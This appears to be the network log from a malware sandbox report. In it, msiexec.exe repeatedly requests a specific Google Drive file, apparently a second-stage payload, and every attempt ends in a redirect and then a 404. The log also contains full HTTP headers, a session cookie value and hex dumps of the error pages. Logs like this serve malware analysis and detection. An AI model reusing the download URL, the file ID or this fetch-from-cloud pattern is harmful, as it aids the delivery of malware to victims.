                                                                                          Content-Security-Policy: script-src 'nonce-PFaZlVlGaTmhZHIEMJAhlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          39192.168.2.650024216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:44 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:44 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgR5T5IIBNlAu68id9NUqC8TCjv0seuOtJIzS6MwKA9Hv5G2OqtoT7eu8hVXQX-TOKhW
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:44 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Dp2O-2xiLaCnMIibsL5aCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 6f 41 42 36 73 50 4d 72 6a 61 33 65 39 42 4f 54 34 35 65 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5oAB6sPMrja3e9BOT45e8w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          40192.168.2.650025142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:45 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:46 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:45 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HEHYDeam7qJ91UIviTN93Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          41192.168.2.650026216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:46 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:47 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTxSlOmU4DobgMLJHY5ZLRCrtUUgJZTp2ff0-MlYwgJ6caztQ7ZmKKrXMDSA6R7GqQD
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:46 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-ZRvmgYKfVQ5WOzv31RZhNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 32 78 64 59 48 74 65 31 49 5f 37 42 68 44 74 5f 4b 6b 4f 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o2xdYHte1I_7BhDt_KkOvQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          42192.168.2.650027142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:47 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:48 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:48 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-GSsDnqFNZlrrQdPIK0_POw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          43192.168.2.650028216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:49 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:49 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSbwdyUoSymxYKtHHdic_Ln2lYlrm9VLVNdZwQLSpjFhlyI3OrxGkUxz69Ck01WM1MZpbrS3ks
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:49 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-xb16yI02nCRC5dwUZV5yrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 71 45 49 78 47 4c 6c 30 58 55 43 5f 4b 6f 6e 37 76 37 65 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hqEIxGLl0XUC_Kon7v7eYA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          44192.168.2.650029142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:50 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:50 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:50 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZCGaWXGa0mYWvowv5AMmmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          45192.168.2.650030216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:51 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:51 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6gBihxxOlikXi1zu7p4tQrKQ1Uk830iyhrIcjeGwfstEuABXOrAC1vp-SBJukU7lpW
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:51 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jbWxc-j2sUDVkQMuonLMEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
